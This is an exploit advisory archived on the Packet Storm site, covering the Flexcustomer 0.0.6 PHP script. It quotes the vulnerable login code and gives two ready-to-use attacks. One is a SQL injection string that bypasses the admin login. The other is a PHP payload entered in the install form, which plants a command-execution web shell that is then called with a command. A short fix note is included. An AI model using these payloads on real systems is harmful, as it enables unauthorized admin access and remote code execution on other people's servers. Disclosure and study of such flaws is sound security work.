what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Flexcustomer 0.0.6 Administrative Login Bypass

Flexcustomer 0.0.6 Administrative Login Bypass
Posted Dec 31, 2008
Authored by Osirys | Site y-osirys.com

Flexcustomer version 0.0.6 suffers from administrative login bypass and possible php data writing vulnerabilities.

tags | exploit, php, vulnerability, bypass
SHA-256 | be5428ee6751c2505cae283d6af7c94558a08377ba31b39d035107f838c9a806

Flexcustomer 0.0.6 Administrative Login Bypass

Change Mirror Download
[START]

####################################################################################################################
[0x01] Informations:

Script : Flexcustomer
Download : http://www.hotscripts.com/jump.php?listing_id=25331&jump_type=1
Vulnerability : Admin Login Bypass / Possible PHP code writing
Author : Osirys
Contact : osirys[at]live[dot]it
Website : http://osirys.org


####################################################################################################################
[0x02] Bug: [Admin Login Bypass]
######

Bug: /[path]/admin/usercheek.php

[CODE]

<?php
session_start();

if (!empty($logincheck)){
$sql = "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'";
$results = $db->select($sql);

[/CODE]

[!FIX] Escape $checkuser and $checkpass in $sql query.


[!] EXPLOIT: /[path]/admin/
Put as username and password: ' or '1=1
You will log in as admin

####################################################################################################################
[0x03] Bug: [Possible PHP data writing]
######

This is not a real bug, but could become it if the administrator doesn't delete the install.php file.
In fact, data that we put in /[path]/admin/install.php forms will be save in a .php file.
So, if install.php is not deleted, we can inject php code, and this bug can become a RCE vulnerability.

[!] EXPLOIT:
1) Go at: /[path]/admin/install.php
2) Put as Database Name this simple PHP code: ";system($_GET['cmd']);$a = "k
3) Fill the other form and press Next
4) Execute your cmd: /[path]/const.inc.php?cmd=id

####################################################################################################################

[/END]

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close